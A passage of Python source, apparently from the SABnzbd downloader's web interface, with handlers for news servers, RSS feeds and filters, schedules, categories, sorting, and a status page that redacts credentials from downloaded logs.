template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_server.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def addServer(self, **kwargs):
return handle_server(kwargs, self.__root, True)
@secured_expose(check_session_key=True, check_configlock=True)
def saveServer(self, **kwargs):
return handle_server(kwargs, self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def testServer(self, **kwargs):
return handle_server_test(kwargs, self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def delServer(self, **kwargs):
kwargs['section'] = 'servers'
kwargs['keyword'] = kwargs.get('server')
del_from_section(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def clrServer(self, **kwargs):
server = kwargs.get('server')
if server:
BPSMeter.do.clear_server(server)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def toggleServer(self, **kwargs):
server = kwargs.get('server')
if server:
svr = config.get_config('servers', server)
if svr:
svr.enable.set(not svr.enable())
config.save_config()
Downloader.do.update_server(server, server)
raise Raiser(self.__root)
def unique_svr_name(server):
""" Return a unique variant on given server name """
num = 0
svr = 1
new_name = server
while svr:
if num:
new_name = '%s@%d' % (server, num)
else:
new_name = '%s' % server
svr = config.get_config('servers', new_name)
num += 1
return new_name
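# Illustrative note (added for clarity, not part of the original code): given an
# existing server entry "news.example.org" (a hypothetical host name), the loop
# above tries "news.example.org", "news.example.org@1", "news.example.org@2", ...
# and returns the first candidate for which config.get_config('servers', name)
# finds no existing entry.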
def check_server(host, port, ajax):
""" Check if server address resolves properly """
if host.lower() == 'localhost' and sabnzbd.AMBI_LOCALHOST:
return badParameterResponse(T('Warning: LOCALHOST is ambiguous, use numerical IP-address.'), ajax)
if GetServerParms(host, int_conv(port)):
return ""
else:
return badParameterResponse(T('Server address "%s:%s" is not valid.') % (host, port), ajax)
def handle_server(kwargs, root=None, new_svr=False):
""" Internal server handler """
ajax = kwargs.get('ajax')
host = kwargs.get('host', '').strip()
if not host:
return badParameterResponse(T('Server address required'), ajax)
port = kwargs.get('port', '').strip()
if not port:
if not kwargs.get('ssl', '').strip():
port = '119'
else:
port = '563'
kwargs['port'] = port
if kwargs.get('connections', '').strip() == '':
kwargs['connections'] = '1'
if kwargs.get('enable') == '1':
msg = check_server(host, port, ajax)
if msg:
return msg
# Default server name is just the host name
server = host
svr = None
old_server = kwargs.get('server')
if old_server:
svr = config.get_config('servers', old_server)
if svr:
server = old_server
else:
svr = config.get_config('servers', server)
if new_svr:
server = unique_svr_name(server)
for kw in ('ssl', 'send_group', 'enable', 'optional'):
if kw not in kwargs.keys():
kwargs[kw] = None
if svr and not new_svr:
svr.set_dict(kwargs)
else:
old_server = None
config.ConfigServer(server, kwargs)
config.save_config()
Downloader.do.update_server(old_server, server)
if root:
if ajax:
return sabnzbd.api.report('json')
else:
raise Raiser(root)
def handle_server_test(kwargs, root):
_result, msg = test_nntp_server_dict(kwargs)
return msg
##############################################################################
class ConfigRss:
def __init__(self, root):
self.__root = root
self.__refresh_readout = None # Set to URL when new readout is needed
self.__refresh_download = False # True when feed needs to be read
self.__refresh_force = False # True if forced download of all matches is required
self.__refresh_ignore = False # True if first batch of new feed must be ignored
self.__evaluate = False # True if feed needs to be re-filtered
        self.__show_eval_button = False # True if the "Apply filters" button should be shown
self.__last_msg = '' # Last error message from RSS reader
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['scripts'] = list_scripts(default=True)
pick_script = conf['scripts'] != []
conf['categories'] = list_cats(default=True)
pick_cat = conf['categories'] != []
conf['rss_rate'] = cfg.rss_rate()
rss = {}
feeds = config.get_rss()
for feed in feeds:
rss[feed] = feeds[feed].get_dict()
filters = feeds[feed].filters()
rss[feed]['filters'] = filters
rss[feed]['filter_states'] = [bool(sabnzbd.rss.convert_filter(f[4])) for f in filters]
rss[feed]['filtercount'] = len(filters)
rss[feed]['pick_cat'] = pick_cat
rss[feed]['pick_script'] = pick_script
rss[feed]['link'] = urllib.parse.quote_plus(feed.encode('utf-8'))
rss[feed]['baselink'] = [get_base_url(uri) for uri in rss[feed]['uri']]
rss[feed]['uris'] = feeds[feed].uri.get_string()
active_feed = kwargs.get('feed', '')
conf['active_feed'] = active_feed
conf['rss'] = rss
conf['rss_next'] = time.strftime(time_format('%H:%M'), time.localtime(sabnzbd.rss.next_run()))
if active_feed:
readout = bool(self.__refresh_readout)
logging.debug('RSS READOUT = %s', readout)
if not readout:
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = False
if self.__evaluate:
msg = sabnzbd.rss.run_feed(active_feed, download=self.__refresh_download, force=self.__refresh_force,
ignoreFirst=self.__refresh_ignore, readout=readout)
else:
msg = ''
self.__evaluate = False
if readout:
sabnzbd.rss.save()
self.__last_msg = msg
else:
msg = self.__last_msg
self.__refresh_readout = None
conf['evalButton'] = self.__show_eval_button
conf['error'] = msg
conf['downloaded'], conf['matched'], conf['unmatched'] = GetRssLog(active_feed)
else:
self.__last_msg = ''
# Find a unique new Feed name
unum = 1
txt = T('Feed') # : Used as default Feed name in Config->RSS
while txt + str(unum) in feeds:
unum += 1
conf['feed'] = txt + str(unum)
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_rss.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def save_rss_rate(self, **kwargs):
""" Save changed RSS automatic readout rate """
cfg.rss_rate.set(kwargs.get('rss_rate'))
config.save_config()
scheduler.restart()
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def upd_rss_feed(self, **kwargs):
""" Update Feed level attributes,
legacy version: ignores 'enable' parameter
"""
if kwargs.get('enable') is not None:
del kwargs['enable']
try:
cf = config.get_rss()[kwargs.get('feed')]
except KeyError:
cf = None
uri = Strip(kwargs.get('uri'))
if cf and uri:
kwargs['uri'] = uri
cf.set_dict(kwargs)
config.save_config()
self.__evaluate = False
self.__show_eval_button = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def save_rss_feed(self, **kwargs):
""" Update Feed level attributes """
try:
cf = config.get_rss()[kwargs.get('feed')]
except KeyError:
cf = None
if 'enable' not in kwargs:
kwargs['enable'] = 0
uri = Strip(kwargs.get('uri'))
if cf and uri:
kwargs['uri'] = uri
cf.set_dict(kwargs)
config.save_config()
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def toggle_rss_feed(self, **kwargs):
""" Toggle automatic read-out flag of Feed """
try:
item = config.get_rss()[kwargs.get('feed')]
except KeyError:
item = None
        if item:
item.enable.set(not item.enable())
config.save_config()
if kwargs.get('table'):
raise Raiser(self.__root)
else:
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def add_rss_feed(self, **kwargs):
""" Add one new RSS feed definition """
feed = Strip(kwargs.get('feed')).strip('[]')
uri = Strip(kwargs.get('uri'))
if feed and uri:
try:
cfg = config.get_rss()[feed]
except KeyError:
cfg = None
if (not cfg) and uri:
kwargs['feed'] = feed
kwargs['uri'] = uri
config.ConfigRSS(feed, kwargs)
# Clear out any existing reference to this feed name
# Otherwise first-run detection can fail
sabnzbd.rss.clear_feed(feed)
config.save_config()
self.__refresh_readout = feed
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = True
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
else:
raise Raiser(self.__root)
else:
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def upd_rss_filter(self, **kwargs):
""" Wrapper, so we can call from api.py """
self.internal_upd_rss_filter(**kwargs)
def internal_upd_rss_filter(self, **kwargs):
""" Save updated filter definition """
try:
feed_cfg = config.get_rss()[kwargs.get('feed')]
except KeyError:
raise rssRaiser(self.__root, kwargs)
pp = kwargs.get('pp')
if IsNone(pp):
pp = ''
script = ConvertSpecials(kwargs.get('script'))
cat = ConvertSpecials(kwargs.get('cat'))
prio = ConvertSpecials(kwargs.get('priority'))
filt = kwargs.get('filter_text')
enabled = kwargs.get('enabled', '0')
if filt:
feed_cfg.filters.update(int(kwargs.get('index', 0)), (cat, pp, script, kwargs.get('filter_type'),
filt, prio, enabled))
# Move filter if requested
index = int_conv(kwargs.get('index', ''))
new_index = kwargs.get('new_index', '')
if new_index and int_conv(new_index) != index:
feed_cfg.filters.move(int(index), int_conv(new_index))
config.save_config()
self.__evaluate = False
self.__show_eval_button = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def del_rss_feed(self, *args, **kwargs):
""" Remove complete RSS feed """
kwargs['section'] = 'rss'
kwargs['keyword'] = kwargs.get('feed')
del_from_section(kwargs)
sabnzbd.rss.clear_feed(kwargs.get('feed'))
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def del_rss_filter(self, **kwargs):
""" Wrapper, so we can call from api.py """
self.internal_del_rss_filter(**kwargs)
def internal_del_rss_filter(self, **kwargs):
""" Remove one RSS filter """
try:
feed_cfg = config.get_rss()[kwargs.get('feed')]
except KeyError:
raise rssRaiser(self.__root, kwargs)
feed_cfg.filters.delete(int(kwargs.get('index', 0)))
config.save_config()
self.__evaluate = False
self.__show_eval_button = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def download_rss_feed(self, *args, **kwargs):
""" Force download of all matching jobs in a feed """
if 'feed' in kwargs:
feed = kwargs['feed']
self.__refresh_readout = feed
self.__refresh_download = True
self.__refresh_force = True
self.__refresh_ignore = False
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def clean_rss_jobs(self, *args, **kwargs):
""" Remove processed RSS jobs from UI """
sabnzbd.rss.clear_downloaded(kwargs['feed'])
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def test_rss_feed(self, *args, **kwargs):
""" Read the feed content again and show results """
if 'feed' in kwargs:
feed = kwargs['feed']
self.__refresh_readout = feed
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = True
self.__evaluate = True
self.__show_eval_button = False
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def eval_rss_feed(self, *args, **kwargs):
""" Re-apply the filters to the feed """
if 'feed' in kwargs:
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = False
self.__show_eval_button = False
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def download(self, **kwargs):
""" Download NZB from provider (Download button) """
feed = kwargs.get('feed')
url = kwargs.get('url')
nzbname = kwargs.get('nzbname')
att = sabnzbd.rss.lookup_url(feed, url)
if att:
pp = att.get('pp')
cat = att.get('cat')
script = att.get('script')
prio = att.get('prio')
if url:
sabnzbd.add_url(url, pp, script, cat, prio, nzbname)
# Need to pass the title instead
sabnzbd.rss.flag_downloaded(feed, url)
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def rss_now(self, *args, **kwargs):
""" Run an automatic RSS run now """
scheduler.force_rss()
raise rssRaiser(self.__root, kwargs)
def ConvertSpecials(p):
""" Convert None to 'None' and 'Default' to '' """
if p is None:
p = 'None'
elif p.lower() == T('Default').lower():
p = ''
return p
def IsNone(value):
""" Return True if either None, 'None' or '' """
return value is None or value == "" or value.lower() == 'none'
def Strip(txt):
""" Return stripped string, can handle None """
try:
return txt.strip()
except:
return None
##############################################################################
_SCHED_ACTIONS = ('resume', 'pause', 'pause_all', 'shutdown', 'restart', 'speedlimit',
'pause_post', 'resume_post', 'scan_folder', 'rss_scan', 'remove_failed',
'remove_completed', 'pause_all_low', 'pause_all_normal', 'pause_all_high',
'resume_all_low', 'resume_all_normal', 'resume_all_high',
'enable_quota', 'disable_quota'
)
class ConfigScheduling:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
def get_days():
days = {"*": T('Daily'), "1": T('Monday'), "2": T('Tuesday'), "3": T('Wednesday'), "4": T('Thursday'),
"5": T('Friday'), "6": T('Saturday'), "7": T('Sunday')}
return days
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
actions = []
actions.extend(_SCHED_ACTIONS)
day_names = get_days()
categories = list_cats(False)
snum = 1
conf['schedlines'] = []
conf['taskinfo'] = []
for ev in scheduler.sort_schedules(all_events=False):
line = ev[3]
conf['schedlines'].append(line)
try:
enabled, m, h, day_numbers, action = line.split(' ', 4)
except:
continue
action = action.strip()
try:
action, value = action.split(' ', 1)
except:
value = ''
value = value.strip()
if value and not value.lower().strip('0123456789kmgtp%.'):
if '%' not in value and from_units(value) < 1.0:
value = T('off') # : "Off" value for speedlimit in scheduler
else:
if '%' not in value and 1 < int_conv(value) < 101:
value += '%'
value = value.upper()
if action in actions:
action = Ttemplate("sch-" + action)
else:
if action in ('enable_server', 'disable_server'):
try:
value = '"%s"' % config.get_servers()[value].displayname()
except KeyError:
value = '"%s" <<< %s' % (value, T('Undefined server!'))
action = Ttemplate("sch-" + action)
if action in ('pause_cat', 'resume_cat'):
action = Ttemplate("sch-" + action)
if value not in categories:
# Category name change
value = '"%s" <<< %s' % (value, T('Incorrect parameter'))
else:
value = '"%s"' % value
if day_numbers == "1234567":
days_of_week = "Daily"
elif day_numbers == "12345":
days_of_week = "Weekdays"
elif day_numbers == "67":
days_of_week = "Weekends"
else:
days_of_week = ", ".join([day_names.get(i, "**") for i in day_numbers])
item = (snum, '%02d' % int(h), '%02d' % int(m), days_of_week, '%s %s' % (action, value), enabled)
conf['taskinfo'].append(item)
snum += 1
actions_lng = {}
for action in actions:
actions_lng[action] = Ttemplate("sch-" + action)
actions_servers = {}
servers = config.get_servers()
for srv in servers:
actions_servers[srv] = servers[srv].displayname()
conf['actions_servers'] = actions_servers
conf['actions'] = actions
conf['actions_lng'] = actions_lng
conf['categories'] = categories
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_scheduling.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def addSchedule(self, **kwargs):
servers = config.get_servers()
minute = kwargs.get('minute')
hour = kwargs.get('hour')
days_of_week = ''.join([str(x) for x in kwargs.get('daysofweek', '')])
if not days_of_week:
days_of_week = '1234567'
action = kwargs.get('action')
arguments = kwargs.get('arguments')
arguments = arguments.strip().lower()
if arguments in ('on', 'enable'):
arguments = '1'
elif arguments in ('off', 'disable'):
arguments = '0'
if minute and hour and days_of_week and action:
if action == 'speedlimit':
if not arguments or arguments.strip('0123456789kmgtp%.'):
arguments = 0
elif action in _SCHED_ACTIONS:
arguments = ''
elif action in servers:
if arguments == '1':
arguments = action
action = 'enable_server'
else:
arguments = action
action = 'disable_server'
elif action in ('pause_cat', 'resume_cat'):
# Need original category name, not lowercased
arguments = arguments.strip()
else:
# Something else, leave empty
action = None
if action:
sched = cfg.schedules()
sched.append('%s %s %s %s %s %s' %
(1, minute, hour, days_of_week, action, arguments))
cfg.schedules.set(sched)
config.save_config()
scheduler.restart(force=True)
raise Raiser(self.__root)
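    # Illustrative note (added for clarity, not part of the original code): each
    # schedule is stored as one space-separated line of the form
    #   '<enabled> <minute> <hour> <days_of_week> <action> <arguments>'
    # e.g. '1 30 4 1234567 speedlimit 50%' (hypothetical values), which index()
    # above parses back with line.split(' ', 4).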
@secured_expose(check_session_key=True, check_configlock=True)
def delSchedule(self, **kwargs):
schedules = cfg.schedules()
line = kwargs.get('line')
if line and line in schedules:
schedules.remove(line)
cfg.schedules.set(schedules)
config.save_config()
scheduler.restart(force=True)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def toggleSchedule(self, **kwargs):
schedules = cfg.schedules()
line = kwargs.get('line')
if line:
for i, schedule in enumerate(schedules):
if schedule == line:
# Toggle the schedule
schedule_split = schedule.split()
schedule_split[0] = '%d' % (schedule_split[0] == '0')
schedules[i] = ' '.join(schedule_split)
break
cfg.schedules.set(schedules)
config.save_config()
scheduler.restart(force=True)
raise Raiser(self.__root)
##############################################################################
class ConfigCats:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['scripts'] = list_scripts(default=True)
conf['defdir'] = cfg.complete_dir.get_clipped_path()
categories = config.get_ordered_categories()
conf['have_cats'] = len(categories) > 1
slotinfo = []
for cat in categories:
            cat['newzbin'] = cat['newzbin'].replace('"', '&quot;')
slotinfo.append(cat)
# Add empty line
empty = {'name': '', 'order': '0', 'pp': '-1', 'script': '', 'dir': '', 'newzbin': '', 'priority': DEFAULT_PRIORITY}
slotinfo.insert(1, empty)
conf['slotinfo'] = slotinfo
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_cat.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def delete(self, **kwargs):
kwargs['section'] = 'categories'
kwargs['keyword'] = kwargs.get('name')
del_from_section(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def save(self, **kwargs):
name = kwargs.get('name', '*')
if name == '*':
newname = name
else:
newname = re.sub('"', '', kwargs.get('newname', ''))
if newname:
# Check if this cat-dir is not sub-folder of incomplete
if same_file(cfg.download_dir.get_path(), real_path(cfg.complete_dir.get_path(), kwargs['dir'])):
return T('Category folder cannot be a subfolder of the Temporary Download Folder.')
# Delete current one and replace with new one
if name:
config.delete('categories', name)
config.ConfigCat(newname.lower(), kwargs)
config.save_config()
raise Raiser(self.__root)
##############################################################################
SORT_LIST = (
'enable_tv_sorting', 'tv_sort_string', 'tv_categories',
'enable_movie_sorting', 'movie_sort_string', 'movie_sort_extra', 'movie_extra_folder',
'enable_date_sorting', 'date_sort_string', 'movie_categories', 'date_categories'
)
class ConfigSorting:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['complete_dir'] = cfg.complete_dir.get_clipped_path()
for kw in SORT_LIST:
conf[kw] = config.get_config('misc', kw)()
conf['categories'] = list_cats(False)
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_sorting.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveSorting(self, **kwargs):
try:
kwargs['movie_categories'] = kwargs['movie_cat']
except:
pass
try:
kwargs['date_categories'] = kwargs['date_cat']
except:
pass
try:
kwargs['tv_categories'] = kwargs['tv_cat']
except:
pass
for kw in SORT_LIST:
item = config.get_config('misc', kw)
value = kwargs.get(kw)
msg = item.set(value)
if msg:
return badParameterResponse(msg)
config.save_config()
raise Raiser(self.__root)
##############################################################################
LOG_API_RE = re.compile(rb"(apikey|api)(=|:)[\w]+", re.I)
LOG_API_JSON_RE = re.compile(rb"'(apikey|api)': '[\w]+'", re.I)
LOG_USER_RE = re.compile(rb"(user|username)\s?=\s?[\S]+", re.I)
LOG_PASS_RE = re.compile(rb"(password)\s?=\s?[\S]+", re.I)
LOG_INI_HIDE_RE = re.compile(rb"(email_pwd|email_account|email_to|rating_api_key|pushover_token|pushover_userkey|pushbullet_apikey|prowl_apikey|growl_password|growl_server|IPv[4|6] address)\s?=\s?[\S]+", re.I)
LOG_HASH_RE = re.compile(rb"([a-fA-F\d]{25})", re.I)
class Status:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
header = build_status(skip_dashboard=kwargs.get('skip_dashboard'))
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'status.tmpl'),
searchList=[header], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def reset_quota(self, **kwargs):
BPSMeter.do.reset_quota(force=True)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def disconnect(self, **kwargs):
Downloader.do.disconnect()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def refresh_conn(self, **kwargs):
# No real action, just reload the page
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def showlog(self, **kwargs):
try:
sabnzbd.LOGHANDLER.flush()
except:
pass
# Fetch the INI and the log-data and add a message at the top
log_data = b'--------------------------------\n\n'
log_data += b'The log includes a copy of your sabnzbd.ini with\nall usernames, passwords and API-keys removed.'
log_data += b'\n\n--------------------------------\n'
log_data += open(sabnzbd.LOGFILE, "rb").read()
log_data += open(config.get_filename(), 'rb').read()
# We need to remove all passwords/usernames/api-keys
log_data = LOG_API_RE.sub(b"apikey=<APIKEY>", log_data)
        log_data = LOG_API_JSON_RE.sub(b"'apikey': '<APIKEY>'", log_data)
        log_data = LOG_USER_RE.sub(rb'\g<1>=<USER>', log_data)
log_data = LOG_PASS_RE.sub(b"password=<PASSWORD>", log_data)
log_data = LOG_INI_HIDE_RE.sub(b"\\1 = <REMOVED>", log_data)
log_data = LOG_HASH_RE.sub(b"<HASH>", log_data)
# Try to replace the username
try:
import getpass
cur_user = getpass.getuser()
if cur_user:
log_data = log_data.replace(utob(cur_user), b'<USERNAME>')
except:
pass
# Set headers
cherrypy.response.headers['Content-Type'] = 'application/x-download;charset=utf-8'
cherrypy.response.headers['Content-Disposition'] = 'attachment;filename="sabnzbd.log"'
return log_data
@secured_expose(check_session_key=True)
def clearwarnings(self, **kwargs):
sabnzbd.GUIHANDLER.clear()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def change_loglevel(self, **kwargs):
cfg.log_level.set(kwargs.get('loglevel'))
config.save_config()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def unblock_server(self, **kwargs):
Downloader.do.unblock(kwargs.get('server'))
# Short sleep so that UI shows new server status
time.sleep(1.0)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def delete(self, **kwargs):
orphan_delete(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def delete_all(self, **kwargs):
orphan_delete_all()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def add(self, **kwargs):
orphan_add(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def add_all(self, **kwargs):
orphan_add_all()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def dashrefresh(self, **kwargs):
# This function is run when Refresh button on Dashboard is clicked
# Put the time consuming dashboard functions here; they only get executed when the user clicks the Refresh button
# PyStone
sabnzbd.PYSTONE_SCORE = getpystone()
# Diskspeed of download (aka incomplete) directory:
dir_speed = diskspeedmeasure(sabnzbd.cfg.download_dir.get_path())
if dir_speed:
sabnzbd.DOWNLOAD_DIR_SPEED = round(dir_speed, 1)
else:
sabnzbd.DOWNLOAD_DIR_SPEED = 0
time.sleep(1.0)
# Diskspeed of complete directory:
dir_speed = diskspeedmeasure(sabnzbd.cfg.complete_dir.get_path())
if dir_speed:
sabnzbd.COMPLETE_DIR_SPEED = round(dir_speed, 1)
else:
sabnzbd.COMPLETE_DIR_SPEED = 0
# Internet bandwidth
sabnzbd.INTERNET_BANDWIDTH = round(internetspeed(), 1)
raise Raiser(self.__root) # Refresh screen
def orphan_delete(kwargs):
path = kwargs.get('name')
if path:
path = os.path.join(long_path(cfg.download_dir.get_path()), path)
logging.info('Removing orphaned job %s', path)
remove_all(path, recursive=True)
def orphan_delete_all():
paths = NzbQueue.do.scan_jobs(all=False, action=False)
for path in paths:
kwargs = {'name': path}
orphan_delete(kwargs)
def orphan_add(kwargs):
path = kwargs.get('name')
if path:
path = os.path.join(long_path(cfg.download_dir.get_path()), path)
logging.info('Re-adding orphaned job %s', path)
NzbQueue.do.repair_job(path, None, None)
def orphan_add_all():
paths = NzbQueue.do.scan_jobs(all=False, action=False)
for path in paths:
kwargs = {'name': path}
orphan_add(kwargs)
def badParameterResponse(msg, ajax=None):
""" Return a html page with error message and a 'back' button """
if ajax:
return sabnzbd.api.report('json', error=msg)
else:
return '''
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<title>SABnzbd %s - %s</title>
</head>
<body>
<h3>%s</h3>
%s
<br><br>
<FORM><INPUT TYPE="BUTTON" VALUE="%s" ONCLICK="history.go(-1)"></FORM>
</body>
</html>
''' % (sabnzbd.__version__, T('ERROR:'), T('Incorrect parameter'), msg, T('Back'))
def ShowString(name, msg):
""" Return a html page listing a file and a 'back' button """
return '''
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<title>%s</title>
</head>
<body>
<FORM><INPUT TYPE="BUTTON" VALUE="%s" ONCLICK="history.go(-1)"></FORM>
<h3>%s</h3>
<code><pre>%s</pre></code>
</body>
</html>
''' % (xml_name(name), T('Back'), xml_name(name), escape(msg))
def GetRssLog(feed):
def make_item(job):
# Make a copy
job = job.copy()
# Now we apply some formatting
job['title'] = job['title']
job['skip'] = '*' * int(job.get('status', '').endswith('*'))
# These fields could be empty
job['cat'] = job.get('cat', '')
job['size'] = job.get('size', '')
job['infourl'] = job.get('infourl', '')
# Auto-fetched jobs didn't have these fields set
if job.get('url'):
job['baselink'] = get_base_url(job.get('url'))
if sabnzbd.rss.special_rss_site(job.get('url')):
job['nzbname'] = ''
else:
job['nzbname'] = job['title']
else:
job['baselink'] = ''
job['nzbname'] = job['title']
if job.get('size', 0):
job['size_units'] = to_units(job['size'])
else:
job['size_units'] = '-'
# And we add extra fields for sorting
if job.get('age', 0):
job['age_ms'] = time.mktime(job['age'].timetuple())
job['age'] = calc_age(job['age'], True)
else:
job['age_ms'] = ''
job['age'] = ''
if job.get('time_downloaded'):
job['time_downloaded_ms'] = time.mktime(job['time_downloaded'])
job['time_downloaded'] = time.strftime(time_format('%H:%M %a %d %b'), job['time_downloaded'])
else:
job['time_downloaded_ms'] = ''
job['time_downloaded'] = ''
return job
jobs = list(sabnzbd.rss.show_result(feed).values())
good, bad, done = ([], [], [])
for job in jobs:
if job['status'][0] == 'G':
good.append(make_item(job))
elif job['status'][0] == 'B':
bad.append(make_item(job))
elif job['status'] == 'D':
done.append(make_item(job))
try:
# Sort based on actual age, in try-catch just to be sure
good.sort(key=lambda job: job['age_ms'], reverse=True)
bad.sort(key=lambda job: job['age_ms'], reverse=True)
done.sort(key=lambda job: job['time_downloaded_ms'], reverse=True)
except:
# Let the javascript do it then..
pass
return done, good, bad
##############################################################################
LIST_EMAIL = (
'email_endjob', 'email_cats', 'email_full',
'email_server', 'email_to', 'email_from',
'email_account', 'email_pwd', 'email_rss'
)
LIST_NCENTER = ('ncenter_enable', 'ncenter_cats',
'ncenter_prio_startup', 'ncenter_prio_download', 'ncenter_prio_pp', 'ncenter_prio_complete', 'ncenter_prio_failed',
'ncenter_prio_disk_full', 'ncenter_prio_warning', 'ncenter_prio_error', 'ncenter_prio_queue_done', 'ncenter_prio_other',
'ncenter_prio_new_login')
LIST_ACENTER = ('acenter_enable', 'acenter_cats',
'acenter_prio_startup', 'acenter_prio_download', 'acenter_prio_pp', 'acenter_prio_complete', 'acenter_prio_failed',
'acenter_prio_disk_full', 'acenter_prio_warning', 'acenter_prio_error', 'acenter_prio_queue_done', 'acenter_prio_other',
'acenter_prio_new_login')
LIST_NTFOSD = ('ntfosd_enable', 'ntfosd_cats',
'ntfosd_prio_startup', 'ntfosd_prio_download', 'ntfosd_prio_pp', 'ntfosd_prio_complete', 'ntfosd_prio_failed',
'ntfosd_prio_disk_full', 'ntfosd_prio_warning', 'ntfosd_prio_error', 'ntfosd_prio_queue_done', 'ntfosd_prio_other',
'ntfosd_prio_new_login')
LIST_PROWL = ('prowl_enable', 'prowl_cats', 'prowl_apikey',
'prowl_prio_startup', 'prowl_prio_download', 'prowl_prio_pp', 'prowl_prio_complete', 'prowl_prio_failed',
'prowl_prio_disk_full', 'prowl_prio_warning', 'prowl_prio_error', 'prowl_prio_queue_done', 'prowl_prio_other',
'prowl_prio_new_login')
LIST_PUSHOVER = ('pushover_enable', 'pushover_cats', 'pushover_token', 'pushover_userkey', 'pushover_device',
'pushover_prio_startup', 'pushover_prio_download', 'pushover_prio_pp', 'pushover_prio_complete', 'pushover_prio_failed',
'pushover_prio_disk_full', 'pushover_prio_warning', 'pushover_prio_error', 'pushover_prio_queue_done', 'pushover_prio_other',
'pushover_prio_new_login', 'pushover_emergency_retry', 'pushover_emergency_expire')
LIST_PUSHBULLET = ('pushbullet_enable', 'pushbullet_cats', 'pushbullet_apikey', 'pushbullet_device',
'pushbullet_prio_startup', 'pushbullet_prio_download', 'pushbullet_prio_pp', 'pushbullet_prio_complete', 'pushbullet_prio_failed',
'pushbullet_prio_disk_full', 'pushbullet_prio_warning', 'pushbullet_prio_error', 'pushbullet_prio_queue_done', 'pushbullet_prio_other',
'pushbullet_prio_new_login')
LIST_NSCRIPT = ('nscript_enable', 'nscript_cats', 'nscript_script', 'nscript_parameters',
'nscript_prio_startup', 'nscript_prio_download', 'nscript_prio_pp', 'nscript_prio_complete', 'nscript_prio_failed',
'nscript_prio_disk_full', 'nscript_prio_warning', 'nscript_prio_error', 'nscript_prio_queue_done', 'nscript_prio_other',
'nscript_prio_new_login')
class ConfigNotify:
def __init__(self, root):
self.__root = root
self.__lastmail = None
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['categories'] = list_cats(False)
conf['lastmail'] = self.__lastmail
conf['have_ntfosd'] = sabnzbd.notifier.have_ntfosd()
